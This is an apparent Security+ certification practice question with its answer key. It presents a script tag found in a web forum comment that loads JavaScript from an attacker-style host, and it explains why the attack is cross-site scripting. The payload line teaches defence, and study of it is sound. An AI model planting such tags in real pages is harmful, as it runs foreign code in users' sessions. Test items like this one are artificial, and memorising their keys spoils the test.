CompTIA Security+ (SY0-501) — Question 522
A security engineer is analyzing the following line of JavaScript code that was found in a comment field on a web forum, which was recently involved in a security breach:
<script src=http://gotcha.com/hackme.js></script>
Given the line of code above, which of the following BEST represents the attack performed during the breach?
Answer options
- A. CSRF
- B. DDoS
- C. DoS
- D. XSS
Correct answer: D
Explanation
The correct answer is D, XSS (Cross-Site Scripting): the script tag posted in the comment field makes the browser of anyone viewing that page load and run the attacker's script in the context of that user's session. Option A (CSRF) does not apply, because CSRF involves unauthorized commands sent from a user the web application trusts, not script injected into a page. Options B (DDoS) and C (DoS) do not apply either: DDoS refers to overwhelming services with traffic, and DoS relates to service disruption, which is not directly represented by this code snippet.